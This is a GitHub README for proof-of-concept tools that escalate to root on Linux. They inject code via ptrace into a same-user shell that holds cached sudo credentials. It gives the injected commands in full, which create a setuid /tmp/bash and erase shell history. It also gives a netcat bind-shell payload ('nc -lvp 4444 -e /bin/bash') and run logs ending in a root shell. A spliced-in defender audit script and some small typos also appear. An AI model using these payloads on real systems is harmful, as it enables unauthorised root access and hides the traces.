
https://github.com/therealdreg/ptrace_misconfiguration_local_privilege_escalation

ptrace misconfiguration Local Privilege Escalation

linux privilege-escalation-linux ptrace-injection x86 x86-64


# ptrace misconfiguration Local Privilege Escalation

Please consider making a donation: https://github.com/sponsors/therealdreg

WARNING! This is a POC; the code is CRAP.

Why this POC? Why ptrace for this? Just for fun. I know, I know, you can get sudo control in other ways x)

Video demo on YouTube: https://youtu.be/3Qmy1Y8W7A8

Injects code via ptrace (as the same user) into shells where sudo is already authenticated.

Exploit requirements:
* ptrace allowed to attach to the user's own processes
* a terminal owned by a user in the sudo group (attacker)
* a terminal owned by the same user where sudo is already authenticated (victim)
* run xpk or ptrex
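A defender-side audit for the two preconditions listed above (same-user ptrace attach allowed, i.e. `ptrace_scope` 0, and a sudo credential cache that is still valid), added here as an example and not part of the xpk/ptrex project; the sysctl key, the sudoers `Defaults` line and the `/proc` path are real, the sample values fed to the functions are constructed.

```shell
#!/bin/sh
# Added defender-side audit; not part of the xpk/ptrex project. It classifies the
# Yama ptrace_scope value the PoC needs (0) and prints the hardening a defender
# would apply. The sysctl key, the sudoers Defaults line and the /proc path are
# real; only the sample values passed to the functions are constructed.

# Map a ptrace_scope value to a one-word class. Only "EXPOSED" (value 0) lets a
# process attach to any other process of the same uid, the PoC's precondition.
ptrace_scope_class() {
    case "$1" in
        0) echo EXPOSED ;;      # classic ptrace: same-uid attach to any process
        1) echo RESTRICTED ;;   # attach only to descendants (Yama's upstream default)
        2) echo ADMIN_ONLY ;;   # attach needs CAP_SYS_PTRACE
        3) echo DISABLED ;;     # no attach at all until reboot
        *) echo UNKNOWN ;;
    esac
}

# True (exit 0) only for the value the PoC relies on.
is_exposed() {
    [ "$(ptrace_scope_class "$1")" = "EXPOSED" ]
}

# Hardening a defender would apply; printed, not applied, so the audit stays read-only.
print_mitigation() {
cat <<'EOF'
# restrict attach to descendants (persist in /etc/sysctl.d/10-ptrace.conf):
kernel.yama.ptrace_scope = 1
# apply immediately:
sysctl -w kernel.yama.ptrace_scope=1
# stop the cached sudo credentials the PoC rides on (edit with visudo):
Defaults timestamp_timeout=0
EOF
}

# Read the live value; a kernel without Yama has no attach restriction, which is
# the same exposure as ptrace_scope=0.
audit_host() {
    f=/proc/sys/kernel/yama/ptrace_scope
    if [ -r "$f" ]; then v=$(cat "$f"); else v=0; echo "no Yama LSM: treating as 0"; fi
    echo "ptrace_scope=$v -> $(ptrace_scope_class "$v")"
    if is_exposed "$v"; then print_mitigation; fi
}

audit_host
```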

WARNING: if GDB is installed on the machine, it is safer to run https://www.exploit-db.com/exploits/46989

'ptrace_scope' misconfiguration Local Privilege Escalation by Marcelo Vazquez (s4vitar) & Victor Lasa (vowkin)

My code is based on the s4vitar & vowkin POC and uses ptrace (no GDB dependency).

I made two POC flavours of the same thing: xpk.c & ptrex.c

Do you want more advanced stuff? Check https://github.com/David-Reguera-Garcia-Dreg/drx_ptrace_shellcode_injector

## xpk.c
stdin hijack (using the ptrace_do lib https://github.com/emptymonkey/ptrace_do): sudo -S cp /bin/bash /tmp + sudo -S chmod +s /tmp/bash + history -c
```
gcc -o xpk xpk.c
./xpk
```

WARNING: only works on x86_64 systems (ptrace_do limitation)

* can inject from an x86_64-compiled xpk into an x86_64 process
* can inject from an x86_64-compiled xpk into an x86 process

## ptrex.c
shellcode injection (using ptrace) that execve()s: python -c 'import os; os.system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")'
```
gcc -o ptrex ptrex.c
./ptrex
```

You can also inject your own Python code:
```
./ptrex full_python_path newcmdline
```

Example with:
* your own python binary (limit 150 bytes): /home/dreg/tmp/python
* bind bash shell Python code (limit 250 bytes): import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")
```
./ptrex /home/dreg/tmp/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'
```

* works on x86_64 and x86 systems
* can inject from an x86_64-compiled ptrex into an x86_64 process
* can inject from an x86-compiled ptrex into an x86 process
* can inject from an x86_64-compiled ptrex into an x86 process

WARNING: injecting from an x86-compiled ptrex into an x86_64 process is not possible

## How to test xpk.c
Open a terminal as a user in the sudo group.

Execute any command with sudo and enter the password, e.g.:
```
dreg@fr33project:~$ tty
/dev/pts/4
dreg@fr33project:~$ id
uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)
dreg@fr33project:~$ sudo whoami
[sudo] password for dreg:
root
dreg@fr33project:~$
```

Open another terminal as the same user and execute ./xpk (the name of the exploit executable matters, don't change it!)
```
dreg@fr33project:~$ tty
/dev/pts/7
dreg@fr33project:~$ .gcc -o xpk xpk.c
dreg@fr33project:~$ ./xpk
David Reguera Garcia aka Dreg exploit without gdb dep, based in:
https://www.exploit-db.com/exploits/46989
'ptrace_scope' misconfiguration Local Privilege Escalation
Authors: Marcelo Vazquez (s4vitar)
Victor Lasa (vowkin)

[*] PID -> bash
[*] Path 2660: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap
[*] PID -> bash
[*] Path 2892: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap
[*] PID -> sh
[*] Path 2998: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap
[*] PID -> bash
[*] Path 2999: /home/dreg
stdin fd: 4
echo "clear && echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1 | echo && history -c && clear" >> /tmp/crap

[*] Cleaning up...
[*] Spawning root shell...
bash-5.0# id
uid=1003(dreg) gid=1003(dreg) euid=0(root) egid=0(root) groups=0(root),27(sudo),1003(dreg)
bash-5.0# whoami
root
bash-5.0#
```

## How to test ptrex.c
Open a terminal as a user in the sudo group.

Execute any command with sudo and enter the password, e.g.:
```
dreg@fr33project:~$ tty
/dev/pts/4
dreg@fr33project:~$ id
uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)
dreg@fr33project:~$ sudo whoami
[sudo] password for dreg:
root
dreg@fr33project:~$
```

Open another terminal as the same user and execute ./ptrex
```
dreg@fr33project:~$ tty
/dev/pts/7
dreg@fr33project:~$ .gcc -o ptrex ptrex.c
dreg@fr33project:~$ ./ptrex
ptrex v0.3-beta - MIT License - Copyright 2020
David Reguera Garcia aka Dreg - [email protected]
http://github.com/David-Reguera-Garcia-Dreg/ - http://www.fr33project.org/
-
ptrace misconfiguration Local Privilege Escalation
using ptrace (no GDB dep) execve
-
Based from: https://www.exploit-db.com/exploits/46989
'ptrace_scope' misconfiguration Local Privilege Escalation by Marcelo Vazquez (s4vitar) & Victor Lasa (vowkin)

To change default python path & cmd injected: ./ptrex full_python_path newcmdline
example: ./ptrex /home/dreg/tmp/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'

/proc/sys/kernel/yama/ptrace_scope : 0
pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d'
current pid: 18888
skipping current shell pid: 18888
current pid: 20156
elf plat: 64
waiting for process
getting registers
injecting shellcode at: 0x00007f33a88890e9
setting instruction pointer to: 0x00007f33a88890e9
runing
please wait...
found suid shell: /tmp/bash
rooting.....
/tmp/bash -p -c 'rm /tmp/bash ; tput cnorm && /bin/bash -p'

bash-5.0# whoami
root
bash-5.0#
```

If this fails, try the bind shell example.

### Example: ptrex.c bind shell with netcat

This example needs netcat installed on the machine.

Open a terminal as a user in the sudo group.

Execute any command with sudo and enter the password, e.g.:
```
dreg@fr33project:~$ tty
/dev/pts/4
dreg@fr33project:~$ id
uid=1003(dreg) gid=1003(dreg) groups=1003(dreg),27(sudo)
dreg@fr33project:~$ sudo whoami
[sudo] password for dreg:
root
dreg@fr33project:~$
```

Open another terminal as the same user and execute ./ptrex
```
dreg@fr33project:~$ tty
/dev/pts/7
dreg@fr33project:~$ .gcc -o ptrex ptrex.c
dreg@fr33project:~$ ./ptrex /usr/bin/python 'import os; os.system("/usr/bin/sudo /bin/nc -lvp 4444 -e /bin/bash")'
dreg@fr33project:~$ nc 127.0.0.1 444
whoami
root
```

## WORKING ON

* Parrot Home/Workstation: 4.6
* Parrot Security: 4.6
* CentOS / RedHat: 7.6
* Kali Linux: 2018.4
* Debian GNU/Linux: 10 (buster), 9.13 (stretch)

## CONTRIBUTORS

nobody loves me

## TODO